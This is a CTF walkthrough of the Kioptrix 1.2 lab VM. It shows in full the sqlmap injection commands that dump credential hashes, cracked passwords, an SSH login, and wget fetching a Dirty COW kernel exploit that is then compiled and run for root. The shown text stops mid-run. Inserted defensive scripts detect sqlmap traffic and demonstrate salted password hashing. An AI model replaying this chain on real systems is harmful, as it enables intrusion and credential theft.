Kioptrix: Level 1.2 (#3) – Walkthrough

Last night I solved most of the web challenges from ctfs.me. I couldn't sleep any more, but I am ranked 3rd. I may write up all of the challenges I have already solved later. Tonight I am trying the next box, the third in the Kioptrix series. Let's get started.

Target IP is 192.168.1.73.

┌─[[email protected]]─[~]
└──> nmap 192.168.1.* -sn -n

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:37 +0630
Nmap scan report for 192.168.1.1
Host is up (0.00038s latency).
MAC Address: 60:E3:27:BE:75:78 (Tp-link Technologies)
Nmap scan report for 192.168.1.73
Host is up (0.00049s latency).
MAC Address: 00:0C:29:ED:78:4A (VMware)
Nmap scan report for 192.168.1.74
Host is up (0.0045s latency).
MAC Address: CC:AF:78:12:3B:9F (Hon Hai Precision Ind.)
Nmap scan report for 192.168.1.100
Host is up (0.00016s latency).
MAC Address: 34:97:F6:C3:0B:66 (Asustek Computer)
Nmap scan report for 192.168.1.101
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.25 seconds

Scan the target again with an Nmap version scan.

┌─[[email protected]]─[~]
└──> nmap -sV 192.168.1.73

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-07 20:40 +0630
Nmap scan report for kioptrix3.com (192.168.1.73)
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
MAC Address: 00:0C:29:ED:78:4A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.29 seconds

Simple: only SSH and HTTP are open. Next, scan for directories with dirb.

┌─[[email protected]]─[~]
└──> dirb http://192.168.1.73 -r

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Jan  7 20:41:09 2018
URL_BASE: http://192.168.1.73/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.73/ ----
==> DIRECTORY: http://192.168.1.73/cache/                                                                    
==> DIRECTORY: http://192.168.1.73/core/                                                                     
+ http://192.168.1.73/data (CODE:403|SIZE:323)                                                               
+ http://192.168.1.73/favicon.ico (CODE:200|SIZE:23126)                                                      
==> DIRECTORY: http://192.168.1.73/gallery/                                                                  
+ http://192.168.1.73/index.php (CODE:200|SIZE:1819)                                                         
==> DIRECTORY: http://192.168.1.73/modules/                                                                  
==> DIRECTORY: http://192.168.1.73/phpmyadmin/                                                               
+ http://192.168.1.73/server-status (CODE:403|SIZE:332)                                                      
==> DIRECTORY: http://192.168.1.73/style/                                                                    
                                                                                                             
-----------------
END_TIME: Sun Jan  7 20:41:17 2018
DOWNLOADED: 4612 - FOUND: 4

Open port 80 first and check whether it is vulnerable. Looking for a parameter to exploit, I found a SQL injection error message when I entered a single quote:

http://kioptrix3.com/gallery/gallery.php?id=1

Now run sqlmap and dump all the data from the tables, but first I try an os-shell upload test. It fails because I don't know the web server's document root.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --is-dba --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:46:03

[20:46:04] [INFO] resuming back-end DBMS 'mysql' 
[20:46:04] [INFO] testing connection to the target URL
[20:46:04] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:46:04] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:46:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:46:04] [INFO] testing if current user is DBA
[20:46:04] [INFO] fetching current user
current user is DBA:    True
[20:46:04] [INFO] going to use a web backdoor for command prompt
[20:46:04] [INFO] fingerprinting the back-end DBMS operating system
[20:46:04] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
[20:46:10] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[20:46:12] [INFO] retrieved web server absolute paths: '/gallery/gallery~.php'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/' via UNION method
[20:46:12] [WARNING] expect junk characters inside the file as a leftover from UNION query
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/gallery/gallery.php/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/gallery/gallery.php/' via UNION method
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method
[20:46:12] [WARNING] unable to upload the file stager on '/var/www/html/'
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/' via UNION method
[20:46:12] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:12] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/var/www/html/gallery/gallery.php/'
[20:46:13] [INFO] trying to upload the file stager on '/var/www/html/gallery/gallery.php/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/'
[20:46:13] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/gallery/gallery.php/' via UNION method
[20:46:13] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method
[20:46:13] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'
[20:46:13] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/'
[20:46:14] [INFO] trying to upload the file stager on '/var/www/nginx-default/gallery/gallery.php/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/srv/www/'
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/srv/www/gallery/gallery.php/'
[20:46:14] [INFO] trying to upload the file stager on '/srv/www/gallery/gallery.php/' via UNION method
[20:46:14] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:14] [INFO] trying to upload the file stager on '/gallery/' via LIMIT 'LINES TERMINATED BY' method
[20:46:14] [WARNING] unable to upload the file stager on '/gallery/'
[20:46:14] [INFO] trying to upload the file stager on '/gallery/' via UNION method
[20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via LIMIT 'LINES TERMINATED BY' method
[20:46:15] [WARNING] unable to upload the file stager on '/gallery/gallery/gallery.php/'
[20:46:15] [INFO] trying to upload the file stager on '/gallery/gallery/gallery.php/' via UNION method
[20:46:15] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
[20:46:15] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 97 times, 500 (Internal Server Error) - 1 times
[20:46:15] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:46:15
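
From the defender's side, the run above leaves an obvious trail in the Apache access log: a lone quote that produced a 500, then UNION ALL SELECT payloads carrying sqlmap's hex-wrapped marker strings, sent with a sqlmap User-Agent. The Python script below is an added example, not code from the original post or from the Kioptrix VM; it applies those heuristics to a few constructed access-log lines modelled on this session. The log lines, the rule names and the regular expressions are my assumptions, not anything the box ships with.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed Apache "combined" log lines modelled on the traffic this sqlmap
# session would produce against gallery.php. They are sample data, not log
# lines taken from the Kioptrix VM.
SAMPLE_LOG = """\
192.168.1.101 - - [07/Jan/2018:20:44:10 +0630] "GET /gallery/gallery.php?id=1 HTTP/1.1" 200 1819 "-" "Mozilla/5.0"
192.168.1.101 - - [07/Jan/2018:20:44:31 +0630] "GET /gallery/gallery.php?id=1%27 HTTP/1.1" 500 812 "-" "Mozilla/5.0"
192.168.1.101 - - [07/Jan/2018:20:46:04 +0630] "GET /gallery/gallery.php?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x71717a7a71%2C0x6c434553716d65%2C0x71717a7671%29%2CNULL%2CNULL%2CNULL--%20eUyW HTTP/1.1" 200 2210 "-" "sqlmap/1.1.12#stable (http://sqlmap.org)"
192.168.1.74 - - [07/Jan/2018:20:50:00 +0630] "GET /gallery/search.php?q=O%27Brien HTTP/1.1" 200 4120 "-" "Mozilla/5.0"
"""

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Heuristics run against each URL-decoded query-string value.
VALUE_RULES = [
    ("union_select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("long_hex_literal", re.compile(r"0x[0-9a-f]{10,}", re.I)),  # sqlmap's 0x7171..71 data markers
    ("sql_comment_tail", re.compile(r"--(?:\s|$)|/\*")),        # '-- eUyW' style terminators
    ("unbalanced_quote", re.compile(r"^[^']*'$")),              # the single-quote probe
]
UA_RULE = ("scanner_user_agent", re.compile(r"sqlmap|nikto|havij|sqlninja", re.I))


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def analyse_request(target, user_agent):
    """Return the names of the heuristics a request trips (empty list = nothing suspicious)."""
    hits = []
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for name, rx in VALUE_RULES:
            if rx.search(value) and name not in hits:
                hits.append(name)
    name, rx = UA_RULE
    if rx.search(user_agent):
        hits.append(name)
    return hits


def scan_log(text):
    """Run the heuristics over every line and return only the suspicious requests."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = analyse_request(rec["target"], rec["ua"])
        if hits:
            findings.append({"ip": rec["ip"], "time": rec["time"], "status": rec["status"],
                             "target": unquote_plus(rec["target"]), "hits": hits})
    return findings


def summarize(findings):
    """Per-source-IP count of each heuristic: the view an analyst would triage from."""
    per_ip = defaultdict(Counter)
    for f in findings:
        per_ip[f["ip"]].update(f["hits"])
    return {ip: dict(c) for ip, c in per_ip.items()}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['time']} status={f['status']} hits={','.join(f['hits'])}")
        print(f"    {f['target']}")
    print(summarize(found))
```

Run it as-is to print the flagged requests and a per-IP count. The unbalanced_quote rule deliberately ignores values such as O'Brien that merely contain an apostrophe, and the long-hex rule keys on the 0x-prefixed literals sqlmap uses to delimit extracted data. Paired with the 500 status, the very first probe is enough to trigger a WAF or fail2ban rule, long before --dump succeeds.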

Find the database name with sqlmap.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --current-db
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:47:35

[20:47:35] [INFO] resuming back-end DBMS 'mysql' 
[20:47:35] [INFO] testing connection to the target URL
[20:47:35] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:47:35] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:47:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:47:35] [INFO] fetching current database
current database:    'gallery'
[20:47:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:47:35] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:47:35

The database name is gallery. Next, list the tables in this database.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --tables -D gallery
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.1.12#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:48:37

[20:48:38] [INFO] resuming back-end DBMS 'mysql' 
[20:48:38] [INFO] testing connection to the target URL
[20:48:38] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:48:38] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:48:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:48:38] [INFO] fetching tables for database: 'gallery'
[20:48:38] [INFO] the SQL query used returns 7 entries
[20:48:38] [INFO] resumed: dev_accounts
[20:48:38] [INFO] resumed: gallarific_comments
[20:48:38] [INFO] resumed: gallarific_galleries
[20:48:38] [INFO] resumed: gallarific_photos
[20:48:38] [INFO] resumed: gallarific_settings
[20:48:38] [INFO] resumed: gallarific_stats
[20:48:38] [INFO] resumed: gallarific_users
Database: gallery                                                                                                                      
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[20:48:38] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:48:38] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:48:38

The dev_accounts table is the main table for the login info. Now list the columns of this table.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns -T dev_accounts -D gallery
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.12#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:49:48

[20:49:49] [INFO] resuming back-end DBMS 'mysql' 
[20:49:49] [INFO] testing connection to the target URL
[20:49:49] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:49:49] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:49:49] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:49:49] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[20:49:49] [INFO] the SQL query used returns 3 entries
[20:49:49] [INFO] resumed: "id","int(10)"
[20:49:49] [INFO] resumed: "username","varchar(50)"
[20:49:49] [INFO] resumed: "password","varchar(50)"
Database: gallery                                                                                                                      
Table: dev_accounts
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(10)     |
| password | varchar(50) |
| username | varchar(50) |
+----------+-------------+

[20:49:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:49:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:49:49

Finally, I dump the username and password data from the dev_accounts table.

┌─[[email protected]]─[~]
└──> sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump -C username,password -T dev_accounts -D gallery
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.12#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:50:52

[20:50:52] [INFO] resuming back-end DBMS 'mysql' 
[20:50:52] [INFO] testing connection to the target URL
[20:50:52] [INFO] heuristics detected web page charset 'ISO-8859-2'
[20:50:52] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71717a7a71,0x6c434553716d6558477153586d41675642434165505649536143556f695946784f65706c464d6277,0x71717a7671),NULL,NULL,NULL-- eUyW
---
[20:50:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[20:50:52] [INFO] fetching entries of column(s) 'password, username' for table 'dev_accounts' in database 'gallery'
[20:50:52] [INFO] the SQL query used returns 2 entries
[20:50:52] [INFO] retrieved: "0d3eccfb887aabd50f243b3f155c0f85","dreg"
[20:50:52] [INFO] retrieved: "5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[20:50:52] [INFO] recognized possible password hashes in column 'password'                                                             
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: gallery
Table: dev_accounts
[2 entries]
+------------+----------------------------------+
| username   | password                         |
+------------+----------------------------------+
| dreg       | 0d3eccfb887aabd50f243b3f155c0f85 |
| loneferret | 5badcaf789d3d1d09794d8f021f40f0e |
+------------+----------------------------------+

[20:50:58] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[20:50:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[20:50:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 20:50:58

The passwords are MD5 hashes; I looked them up at hashkiller.co.uk, a really nice site. After cracking the hashes I got the following passwords:

0d3eccfb887aabd50f243b3f155c0f85 MD5 : Mast3r
5badcaf789d3d1d09794d8f021f40f0e MD5 : starwars
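
The lookup at hashkiller was instant because dev_accounts stores plain, unsalted MD5: anyone holding the hash can match it against a precomputed table. The Python below is an added example, not code from the post or from the Gallarific application. It confirms that the two dumped hashes are exactly MD5 of the recovered passwords, then shows the storage scheme the application should have used: salted PBKDF2-HMAC-SHA256 with a work factor. The encoded record format and the iteration count are my choices.

```python
import hashlib
import hmac
import os

# The two hashes dumped from dev_accounts above, paired with the plaintexts
# the post recovered for them. Everything else in this file is constructed.
DUMPED = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}
RECOVERED = {"dreg": "Mast3r", "loneferret": "starwars"}

# Work factor for PBKDF2-HMAC-SHA256 (assumed value; OWASP's 2023 guidance is 600,000).
PBKDF2_ITERATIONS = 600_000


def is_unsalted_md5(password, digest_hex):
    """True when digest_hex is exactly MD5(password): no salt, no work factor."""
    return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), digest_hex)


def verify_dump():
    """Confirm that each dumped hash is plain MD5 of the recovered password."""
    return {user: is_unsalted_md5(RECOVERED[user], digest) for user, digest in DUMPED.items()}


def hash_password(password, iterations=PBKDF2_ITERATIONS):
    """Salted PBKDF2-HMAC-SHA256, encoded as 'pbkdf2_sha256$<iters>$<salt hex>$<digest hex>'."""
    salt = os.urandom(16)  # fresh per password: equal passwords hash differently
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def check_password(password, stored):
    """Re-derive the digest with the stored salt and iteration count; compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash format: {algo}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    print("dumped hashes are unsalted MD5:", verify_dump())
    stored = hash_password("starwars")
    print("hardened record:", stored)
    print("correct password accepted:", check_password("starwars", stored))
    print("wrong password rejected:", not check_password("Starwars", stored))
```

With the salted scheme, two users who both chose starwars get different records, so a leaked table cannot be matched against a rainbow table, and each guess costs the attacker the full iteration count instead of one MD5 call.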

The final credentials are dreg:Mast3r and loneferret:starwars. I had already noticed that SSH was open during the initial scan of the box. Let's try logging in over SSH with these credentials.

┌─[[email protected]]─[~]
└──> ssh dreg@192.168.1.73
dreg@192.168.1.73's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sun Jan  7 15:56:07 2018 from 192.168.1.101
dreg@Kioptrix3:~$ ls -al; uname -a; cat /etc/passwd
total 24
drwxr-xr-x 2 dreg dreg 4096 2018-01-07 15:56 .
drwxr-xr-x 5 root root 4096 2011-04-16 07:54 ..
-rw------- 1 dreg dreg  245 2018-01-07 15:56 .bash_history
-rw-r--r-- 1 dreg dreg  220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg 2940 2011-04-16 07:54 .bashrc
-rw-r--r-- 1 dreg dreg  586 2011-04-16 07:54 .profile
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash

Login succeeded with the first username, and I found two users on the system. The kernel is version 2.6, an old kernel. I'm not sure it will get me root, but let's try.

Searching Google, I found the Dirty COW exploit to root this kernel.

https://www.exploit-db.com/exploits/40839
dreg@Kioptrix3:~$ wget --no-check-certificate https://www.exploit-db.com/raw/40839 -O dirty.c
--16:01:56--  https://www.exploit-db.com/raw/40839
           => `dirty.c'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 5,006 (4.9K) [text/plain]

100%[============================================================================================>] 5,006         --.--K/s             

16:01:57 (303.35 MB/s) - `dirty.c' saved [5006/5006]

dreg@Kioptrix3:~$ gcc -pthread dirty.c -o dirty -lcrypt
dirty.c:193:2: warning: no newline at end of file
dreg@Kioptrix3:~$ ./dirty 133720
-rbash: ./dirty: restricted: cannot specify `/' in command names

gcc compiled it, but running it is not allowed from dreg's restricted shell (rbash). Let me switch to the other user.

dreg@Kioptrix3:~$ su loneferret
Password: 
loneferret@Kioptrix3:/home/dreg$ ls -al
total 44
drwxr-xr-x 2 dreg dreg  4096 2018-01-07 16:02 .
drwxr-xr-x 5 root root  4096 2011-04-16 07:54 ..
-rw------- 1 dreg dreg   245 2018-01-07 15:56 .bash_history
-rw-r--r-- 1 dreg dreg   220 2011-04-16 07:54 .bash_logout
-rw-r--r-- 1 dreg dreg  2940 2011-04-16 07:54 .bashrc
-rwxr-xr-x 1 dreg dreg 10939 2018-01-07 16:02 dirty
-rw-r--r-- 1 dreg dreg  5006 2018-01-07 16:01 dirty.c
-rw-r--r-- 1 dreg dreg   586 2011-04-16 07:54 .profile
loneferret@Kioptrix3:/home/dreg$ ./dirty 133720
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 133720
Complete line:
firefart:fiptwK6toyYJg:0:0:pwned:/root:/bin/bash

mmap: b7fe0000
madvise 0

ptrace 0
